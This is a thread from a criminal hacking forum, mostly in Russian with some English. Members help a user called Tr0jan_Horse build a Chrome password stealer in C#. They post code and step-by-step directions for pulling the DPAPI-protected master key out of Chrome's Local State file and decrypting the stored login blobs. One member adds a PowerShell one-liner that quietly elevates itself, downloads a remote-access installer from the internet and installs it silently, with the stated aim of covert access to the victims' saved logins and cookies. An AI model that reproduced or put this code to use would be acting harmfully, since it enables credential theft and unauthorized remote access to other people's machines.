• XSS.stack #1 – первый литературный журнал от юзеров форума

Кто-то знает, как сделать рдп и как работать с DPAPI?

Отслеживать
Tr0jan_Horse

Tr0jan_Horse

RAID-массив
Пользователь
Регистрация
21.05.2023
Сообщения
88
Реакции
27
Приветствую, заинтересовала тема, как написать на C# рдп соединение, пробовал еще декриптануть пароли в новых версиях хрома и там шиш с маслом был, интересно послушать ваше мнение, как бы вы организовали реверс рдп и расшифровку паролей хрома после обновления. Если есть уже какие-то статьи и вы поедлитесь источником буду благодарен, всем хорошего дня!
 
pentesterMaster сказал(а):
hello,
Before asking here better google(not advertising) ... i see there are a lot of stuffs to learn on google rather asking the forum,

on the forum come with something like ... i have done this and still am getting error .. it will be simple for people to help you.
Спасибо за ответ, но дело в том еще, что с рдп я более менее разобрался, а DPAPI обновил защиту гугл и та информация, которую можно было нагуглить потеряла свою актуальность.
 
Tr0jan_Horse сказал(а):
Спасибо за ответ, но дело в том еще, что с рдп я более менее разобрался, а DPAPI обновил защиту гугл и та информация, которую можно было нагуглить потеряла свою актуальность.
Привет, в хроме после 80 версии в файле Local State Находиться ключ aes gcm 256(защищенный dpapi) им можно декриптить все данные из бд хрома, на гитхабе куча примеров.
 
EternityTeam сказал(а):
Привет, в хроме после 80 версии в файле Local State Находиться ключ aes gcm 256(защищенный dpapi) им можно декриптить все данные из бд хрома, на гитхабе куча примеров.
Сейчас хром уже 119 версии, насколько ти примеры будут актуальны?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Tr0jan_Horse сказал(а):
Сейчас хром уже 119 версии, насколько ти примеры будут актуальны?
Начиная с 80 версии хрома шифрование не менялось
 
Lumma сказал(а):
Начиная с 80 версии хрома шифрование не менялось
О, Люмма, моё почтение!
Спасибо за ответ, интересно, просто слышал, что они патчат чуть ли не каждую неделю, вот и не понятно.
 
Tr0jan_Horse сказал(а):
Oh Lumma, my respect!
Thanks for the answer, I wonder, I just heard that they patch almost every week, that’s not clear.


chromium source code is open ... it is kind of a nightmare to find things there but it is all there...
chrome has very few changes from the chromium source code that we cant be sure but the password encryption to store in the sqlite database inside the users directory is not something that they change...

C++: 
bool OSCryptImpl :: EncryptString (const std :: string & plaintext,
                            std :: string * ciphertext) {
  if (use_legacy_)
    return EncryptStringWithDPAPI (plaintext, ciphertext);

  crypto :: Aead aead (crypto :: Aead :: AES_256_GCM);

  const auto key = GetRawEncryptionKey ();
  aead.Init (& key);

  // Note: can only check these once AEAD is initialized.
  DCHECK_EQ (kKeyLength, aead.KeyLength ());
  DCHECK_EQ (kNonceLength, aead.NonceLength ());

  std :: string nonce;
  crypto :: RandBytes (base :: WriteInto (& nonce, kNonceLength + 1), kNonceLength);

  if (!aead.Seal (plaintext, nonce, std :: string (), ciphertext))
    return false;

  ciphertext- > insert (0, nonce);
  ciphertext- > insert (0, kEncryptionVersionPrefix);
  return true;
}

maybe this code can get you started...

C#: 
using System;
using System.IO;
using System.Text;
using Org.BouncyCastle.Crypto;
using Org.BouncyCastle.Crypto.Engines;
using Org.BouncyCastle.Crypto.Modes;
using Org.BouncyCastle.Crypto.Parameters;

class GcmAeadDecryptor
{
    public static void Main()
    {
        try
        {
            // Replace these with your actual values
            byte[] key = Encoding.UTF8.GetBytes("YourEncryptionKey");
            byte[] nonce = Encoding.UTF8.GetBytes("YourNonce");
            byte[] ciphertext = Convert.FromBase64String("YourBase64EncodedCipherText");
            byte[] associatedData = Encoding.UTF8.GetBytes("YourAssociatedData");

            byte[] decryptedData = DecryptGcmAead(key, nonce, ciphertext, associatedData);

            Console.WriteLine("Decrypted Data: " + Encoding.UTF8.GetString(decryptedData));
        }
        catch (Exception ex)
        {
            Console.WriteLine("Error: " + ex.Message);
        }
    }

    static byte[] DecryptGcmAead(byte[] key, byte[] nonce, byte[] ciphertext, byte[] associatedData)
    {
        GcmBlockCipher cipher = new GcmBlockCipher(new AesEngine());
        KeyParameter keyParam = new KeyParameter(key);
        ParametersWithIV parameters = new ParametersWithIV(keyParam, nonce);

        cipher.Init(false, parameters);

        // Set the associated data
        if (associatedData != null && associatedData.Length > 0)
        {
            cipher.ProcessAadBytes(associatedData, 0, associatedData.Length);
        }

        // Decrypt the ciphertext
        byte[] decrypted = new byte[cipher.GetOutputSize(ciphertext.Length)];
        int len = cipher.ProcessBytes(ciphertext, 0, ciphertext.Length, decrypted, 0);
        cipher.DoFinal(decrypted, len);

        return decrypted;
    }
}

on windows, the "master key" is encrypted inside the Local state file... (%LOCALAPPDATA%\Google\Chrome\User Data\Local State)
you decrypt this using the cryptunprotectdata from win crypt api

C#: 
using System;
using System.Runtime.InteropServices;
using System.Text;

class Program
{
    [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool CryptProtectData(
        ref DATA_BLOB pDataIn,
        string szDataDescr,
        ref DATA_BLOB pOptionalEntropy,
        IntPtr pvReserved,
        ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
        int dwFlags,
        ref DATA_BLOB pDataOut
    );

    [DllImport("Crypt32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    [return: MarshalAs(UnmanagedType.Bool)]
    public static extern bool CryptUnprotectData(
        ref DATA_BLOB pDataIn,
        StringBuilder szDataDescr,
        ref DATA_BLOB pOptionalEntropy,
        IntPtr pvReserved,
        ref CRYPTPROTECT_PROMPTSTRUCT pPromptStruct,
        int dwFlags,
        ref DATA_BLOB pDataOut
    );

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct DATA_BLOB
    {
        public int cbData;
        public IntPtr pbData;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct CRYPTPROTECT_PROMPTSTRUCT
    {
        public int cbSize;
        public int dwPromptFlags;
        public IntPtr hwndApp;
        public string szPrompt;
    }

    static void Main()
    {
        try
        {
            string originalData = "SecretData123";

            // Encrypt data
            DATA_BLOB dataIn = new DATA_BLOB
            {
                cbData = Encoding.Unicode.GetBytes(originalData).Length,
                pbData = Marshal.StringToCoTaskMemUni(originalData)
            };

            DATA_BLOB dataOut = new DATA_BLOB();
            DATA_BLOB entropy = new DATA_BLOB();

            CRYPTPROTECT_PROMPTSTRUCT prompt = new CRYPTPROTECT_PROMPTSTRUCT
            {
                cbSize = Marshal.SizeOf(typeof(CRYPTPROTECT_PROMPTSTRUCT)),
                dwPromptFlags = 0,
                hwndApp = IntPtr.Zero,
                szPrompt = null
            };

            if (CryptProtectData(ref dataIn, "example", ref entropy, IntPtr.Zero, ref prompt, 0, ref dataOut))
            {
                Console.WriteLine("Data encrypted successfully.");

                // Decrypt data
                DATA_BLOB decryptedData = new DATA_BLOB();

                if (CryptUnprotectData(ref dataOut, null, ref entropy, IntPtr.Zero, ref prompt, 0, ref decryptedData))
                {
                    string decryptedString = Marshal.PtrToStringUni(decryptedData.pbData);
                    Console.WriteLine("Decrypted Data: " + decryptedString);
                    Marshal.ZeroFreeCoTaskMemUnicode(decryptedData.pbData);
                }
                else
                {
                    int error = Marshal.GetLastWin32Error();
                    Console.WriteLine("Error decrypting data. Error code: " + error);
                }

                Marshal.ZeroFreeCoTaskMemUnicode(dataOut.pbData);
            }
            else
            {
                int error = Marshal.GetLastWin32Error();
                Console.WriteLine("Error encrypting data. Error code: " + error);
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine("Error: " + ex.Message);
        }
    }
}

and for the sqlite..

C#: 
using System;
using System.Data.SQLite;
using System.IO;

class Program
{
    static void Main()
    {
        string connectionString = "Data Source=your_database_file.db;Version=3;";

        using (SQLiteConnection connection = new SQLiteConnection(connectionString))
        {
            connection.Open();

            // Example: Reading a BLOB column
            string query = "SELECT ID, BinaryDataColumn FROM YourTableName;";

            using (SQLiteCommand command = new SQLiteCommand(query, connection))
            {
                using (SQLiteDataReader reader = command.ExecuteReader())
                {
                    while (reader.Read())
                    {
                        int id = reader.GetInt32(reader.GetOrdinal("ID"));
                        byte[] binaryData = GetBytes(reader, "BinaryDataColumn");

                        Console.WriteLine($"ID: {id}, BinaryData Length: {binaryData.Length}");
                       
                        // Process binary data as needed
                        // For example, you can convert it to a string:
                        string binaryDataAsString = System.Text.Encoding.UTF8.GetString(binaryData);
                        Console.WriteLine($"BinaryData as String: {binaryDataAsString}");
                    }
                }
            }
        }
    }

    // Helper method to safely read a BLOB column
    static byte[] GetBytes(SQLiteDataReader reader, string columnName)
    {
        const int CHUNK_SIZE = 2 * 1024; // 2 KB chunks

        long bytesRead;
        long fieldOffset = 0;
        byte[] buffer = new byte[CHUNK_SIZE];
        using (MemoryStream stream = new MemoryStream())
        {
            while ((bytesRead = reader.GetBytes(reader.GetOrdinal(columnName), fieldOffset, buffer, 0, buffer.Length)) > 0)
            {
                stream.Write(buffer, 0, (int)bytesRead);
                fieldOffset += bytesRead;
            }
            return stream.ToArray();
        }
    }
}

mix the ingredients and start doing some experiments...

let us know what you got done ... good luck

ps: the blob inside the sqlite database has the following layout:

VERSION + NONCE + ENCRYPTED_DATA

version will be the characters "v10" (I seems it can be v11 but honestly I just skipped the 3 first bytes and is has worked so far...)
NONCE = 12 RANDOM BYTES

and the encrypted_data is the data you want to decrypt...

you get the bytes (consider 0 indexed) from 3 (included) to 15 (not included) and then from 15 (included) to the end...
the first part is your nonce and the rest is the encrypted_data...

the key you got from the local state.. decrypted it with cryptunprotectdata and feed everything to the aes_gcm_decryptor(nonce, key, data)..
 
Последнее редактирование:
I don't mean to flood or stray off-topic, but I think you would save a lot of headache by using some client that can silently install and that comes with the benefit of being code-signed. Once you have remote you can have direct access local chrome appdata logins, network cookie, and so on. Can easily be done from interactive shells also.
 
DimmuBurgor сказал(а):
I don't mean to flood or stray off-topic, but I think you would save a lot of headache by using some client that can silently install and that comes with the benefit of being code-signed. Once you have remote you can have direct access local chrome appdata logins, network cookie, and so on. Can easily be done from interactive shells also.

I love your signature, btw...

what kind of client would be code-signed? I think I am not so ahead on the curve, please drop a light for us.
 
DimmuBurgor сказал(а):
Код: 
$downloadUrl = "https://deskroll.com/download/win/gtc/DeskRollSetup.exe"; $savePath = "C:\ProgramData\DeskRollSetup.exe"; $wc = New-Object System.Net.WebClient; try { Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs -WindowStyle Hidden; $wc.DownloadFile($downloadUrl, $savePath); Write-Host "File downloaded successfully." } catch { Write-Host "An error occurred while downloading the file: $_" } finally { $wc.Dispose() }
Код: 
cd c:\programdata; ./DeskRollSetup.exe /S --link_token=yourlinktokenhere
 
recently stumbled upon a signed xvfb driver also if you're interested i will share that, too, although I have not had time to test it

EDIT: Should have noted *for windows* since that would be nothing spectacular in and of itself for nix boxes
 
DimmuBurgor сказал(а):
recently stumbled upon a signed xvfb driver also if you're interested i will share that, too, although I have not had time to test it

EDIT: Should have noted *for windows* since that would be nothing spectacular in and of itself for nix boxes
sure, please share... but wait... that would be like gold... right!?

I noted something
The infrastructure for DeskRoll backend is located in the United States. Our R&D office for DeskRoll is in Tomsk, Russia (GMT +7) so we mainly answer phone calls in that time zone.

I just love Russian community... so amazing...
 
Последнее редактирование:
psychlo сказал(а):
sure, please share... but wait... that would be like gold... right!?

I noted something


I just love Russian community... so amazing...
https://www.amyuni[.]com/forum/viewtopic.php?p=9545&hilit=display+adapter#p9545 Pretty sure I found it somewhere in here. Leaving the resource instead of a download link since it might be a bit negligent to do so without testing first!
EDIT:
https://github.com/M2Team/NanaRun if you're working with patching that requires trustedinstaller privs =)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх